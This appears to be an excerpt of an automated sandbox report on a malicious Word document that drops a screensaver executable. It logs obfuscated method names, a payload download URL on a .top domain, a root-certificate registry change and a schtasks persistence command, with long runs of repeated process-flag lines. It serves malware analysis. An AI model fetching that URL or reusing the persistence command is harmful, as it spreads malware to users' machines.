Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, fgdXJt4fnOeV6XjIJC.cs	High entropy of concatenated method names: 'aZF0EdgrJe', 'XCE0eNq9fR', 'oh80iGKxUq', 'Gcd0CnkGDE', 'QoV0ai0QbB', 'BaS0cwTBbG', 'QVt0Rd984F', 'Ctb0m4CNRf', 'XG403njMfh', 'G1b0MNIsyQ'
Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, vPbiHgzJKkLT4EtXh3.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PbYuFdJMwo', 'CjcuZxY51I', 'GP4udf1xpT', 'Coau61FgV5', 'Vavu2BTrfo', 'KfQuuIFyY8', 'KcwuWRKZn4'
Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, OK3X7QZlBJ2Zm72Re2.cs	High entropy of concatenated method names: 'W5dcEHYqZd', 'u04ciTu9P4', 'IjUcak9BTV', 'wPicRDNdtP', 'AtkcmSDl9T', 'JRUa7jb0e8', 'xhyaHNAwU7', 'dIEaTR3t5S', 'RRfarKYrOd', 'dE2aJjBOcd'
Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, BxSxBGjWdM9kRNhawOJ.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uLyWYQt1J1', 'ntAWXjb1oF', 'tMbWDQXAA4', 'yyvWnOhsqR', 'xwMW7b4QF9', 'u9LWH62pAZ', 'w5BWTq7rLQ'
Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, MyqKeWG6lullt0slAL.cs	High entropy of concatenated method names: 'qoTfRfySDo', 'WDUfmARhGB', 'D5DfMTcmKU', 'hpvfoT1iK1', 'gJpfZgtP6h', 'KQHfduWWyQ', 'rpcRSoIBQ57BUDmqdc', 'pt9w83Gsp9iPf1InfV', 'FcEnRUpTEb5MKOcRhJ', 's4xff3HfnC'
Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, EAjgrar6JjgJlO01q9.cs	High entropy of concatenated method names: 'aSRFjlyn2x', 'vxRFwAFjdh', 'jryFKcHqba', 'fHVFqHDoJF', 'UK6FvAkYsr', 'LDgFsd5Y1Q', 'NYIFhi8moa', 'mf8FIVq6Fn', 'lduFBZwfXs', 'hBwFAIj86Z'
Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, Ii3oNOI3i98I4b04u6.cs	High entropy of concatenated method names: 'XP4CtRh3Rw', 'uk8Cl6BJ4p', 'Ov5Cj5O8Un', 'PEhCwQyQDa', 'd4PCZqsr3O', 'adOCdCmPCL', 'r8JC6TUyKA', 'JacC2ZdWhA', 'FniCurWda9', 'CSLCW1I9nQ'
Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, bAbhZUjcvmmSaJhbsMu.cs	High entropy of concatenated method names: 'a1QuL0NrFj', 'ONVuPaqeba', 'INZuG8RCQ2', 'VKZutCaFmt', 'WfLub5VBqG', 'w6huld8LP4', 'W9Hup6uLp7', 'lPLujRbM8p', 'vh6uwnK1Dx', 'ba9u8JVBns'
Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, pTdTlrEvmDRRL24B7c.cs	High entropy of concatenated method names: 'qdRRLd68xx', 'lYIRPM5JdT', 'v2NRGGqMUw', 'E0NRtcHWQm', 'XKCRbYYOpw', 'KGORlovOAo', 'ke6Rp4c9Iy', 'QlqRjDVbOK', 'qC3RwabaDR', 'ResR8jShpu'
Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, VbQFPTPSSxlurm7Wrc.cs	High entropy of concatenated method names: 'ToString', 'cmUdAoPhyV', 'yUYdqR2gjr', 'PQBd1RjlCh', 'xXmdvsCk0W', 'o8adscFbKZ', 'QMydS4V73y', 'VP3dhSoxI5', 'KwCdIb2vYd', 'q7FdkcfdiR'
Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, dbodLQg9g3GrmB8wGu.cs	High entropy of concatenated method names: 'FwMufWDisn', 'uFUu0XS7Hm', 'spAuNCsuSQ', 'wgFueLJeUB', 'JmTuicD9Bv', 'X45uai6KN5', 'x22ucnVePH', 'xkB2T8DDnE', 'cFQ2rxbPH5', 'Syo2JdYRsB'
Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, QQ1L22qkxrIU3E6iOb.cs	High entropy of concatenated method names: 'cTOZBFPV2q', 'wGAZVtmrmD', 'RLGZYVLWlq', 'NeFZXcUB27', 'tWiZqouw15', 'kDxZ10LenO', 'acJZvcUTuS', 'GflZs32HuT', 'kNFZSQcZoH', 'AkUZhGN0MA'
Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, vOisVsp2ujdyCRDr6Q.cs	High entropy of concatenated method names: 'K2J6rGwcc3', 'rT265rhMrY', 'gaI2gntTs8', 'apL2fUpbUs', 'I0M6AwqGw8', 'Quj6VvdrUi', 'i1m6xnhB7E', 'xhH6YkTWZT', 'RT56XrsYb3', 'q5u6DgDon5'

Persistence and Installation Behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \Device\RdpDr\;:1\meridianresourcellc.top@SSL\DavWWWRoot			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \Device\RdpDr\;:1\meridianresourcellc.top@SSL\DavWWWRoot			Jump to behavior

Source: settings.xml.rels

Extracted files from sample: https://meridianresourcellc.top/swagodi.doc

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\swagodi78811.scr			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\swagodi[1].scr			Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File dump: swagodi[1].doc.0.dr			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File dump: 9F4A4ED3.doc.0.dr			Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Section loaded: netapi32.dll and davhlpr.dll loaded

Jump to behavior

Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	File created: C:\Users\user\AppData\Roaming\gRpkBp.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\swagodi78811.scr			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\swagodi[1].scr			Jump to dropped file

Boot Survival

Source: C:\Users\user\AppData\Roaming\swagodi78811.scr

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gRpkBp" /XML "C:\Users\user\AppData\Local\Temp\tmpD135.tmp"

Hooking and other Techniques for Hiding and Protection

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
